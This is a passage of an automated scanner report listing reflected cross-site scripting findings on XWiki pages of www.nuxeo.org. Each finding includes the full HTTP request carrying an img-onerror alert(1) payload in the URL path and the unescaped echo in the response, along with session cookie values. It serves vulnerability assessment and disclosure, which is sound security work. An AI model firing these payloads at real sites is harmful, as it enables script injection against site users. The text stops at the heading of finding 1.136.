This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRss89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebRss89aa6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E625cf66d6b7?format=xar&amp;name=Main.WebRss89aa6"><img src=a onerror=alert(1)>625cf66d6b7&amp;pages=Main.WebRss89aa6">
...[SNIP]...

1.124. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6 was submitted in the REST URL parameter 4. This input was echoed as ce21f"><img src=a onerror=alert(1)>527223fb6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince21f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E527223fb6d6/WebSearch?format=xar&amp;name=Maince21f"><img src=a onerror=alert(1)>527223fb6d6.WebSearch&amp;pages=Maince21f">
...[SNIP]...

1.125. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89 was submitted in the REST URL parameter 4. This input was echoed as 5df85<img src=a onerror=alert(1)>8a2f5dddb89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5df85%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8a2f5dddb89/">Main5df85<img src=a onerror=alert(1)>8a2f5dddb89</a>
...[SNIP]...

1.126. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb was submitted in the REST URL parameter 5. This input was echoed as 5f4e0<img src=a onerror=alert(1)>60a04462bbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch5f4e0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E60a04462bbb'>WebSearch5f4e0<img src=a onerror=alert(1)>60a04462bbb</a>
...[SNIP]...

1.127. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 was submitted in the REST URL parameter 5. This input was echoed as 9111c"><img src=a onerror=alert(1)>864bc9e0d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebSearch9111c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E864bc9e0d28?format=xar&amp;name=Main.WebSearch9111c"><img src=a onerror=alert(1)>864bc9e0d28&amp;pages=Main.WebSearch9111c">
...[SNIP]...

1.128. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c was submitted in the REST URL parameter 4. This input was echoed as f6e09<img src=a onerror=alert(1)>c2ab2f9a43c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12962
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf6e09%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2ab2f9a43c/">Mainf6e09<img src=a onerror=alert(1)>c2ab2f9a43c</a>
...[SNIP]...

1.129. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015 was submitted in the REST URL parameter 4. This input was echoed as 924d9"><img src=a onerror=alert(1)>50183281015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main924d9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50183281015/WindowsService?format=xar&amp;name=Main924d9"><img src=a onerror=alert(1)>50183281015.WindowsService&amp;pages=Main924d9">
...[SNIP]...

1.130. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 was submitted in the REST URL parameter 5. This input was echoed as 789b1"><img src=a onerror=alert(1)>6568bdce5f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WindowsService789b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6568bdce5f7?format=xar&amp;name=Main.WindowsService789b1"><img src=a onerror=alert(1)>6568bdce5f7&amp;pages=Main.WindowsService789b1">
...[SNIP]...

1.131. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd was submitted in the REST URL parameter 5. This input was echoed as 673bb<img src=a onerror=alert(1)>0945b5817dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService673bb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0945b5817dd'>WindowsService673bb<img src=a onerror=alert(1)>0945b5817dd</a>
...[SNIP]...

1.132. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de was submitted in the REST URL parameter 4. This input was echoed as 126ea"><img src=a onerror=alert(1)>218d536e8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki126ea%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E218d536e8de/Admin?format=xar&amp;name=XWiki126ea"><img src=a onerror=alert(1)>218d536e8de.Admin&amp;pages=XWiki126ea">
...[SNIP]...

1.133. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca was submitted in the REST URL parameter 4. This input was echoed as 1323f<img src=a onerror=alert(1)>ed793d6b7ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki1323f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eed793d6b7ca/">XWiki1323f<img src=a onerror=alert(1)>ed793d6b7ca</a>
...[SNIP]...

1.134. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 was submitted in the REST URL parameter 5. This input was echoed as 849fa<img src=a onerror=alert(1)>8082881189 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12833
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin849fa%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8082881189'>Admin849fa<img src=a onerror=alert(1)>8082881189</a>
...[SNIP]...

1.135. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 was submitted in the REST URL parameter 5. This input was echoed as 1a623"><img src=a onerror=alert(1)>31c99b72496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Admin1a623%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31c99b72496?format=xar&amp;name=XWiki.Admin1a623"><img src=a onerror=alert(1)>31c99b72496&amp;pages=XWiki.Admin1a623">
...[SNIP]...

1.136. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]  previous  next

Summary

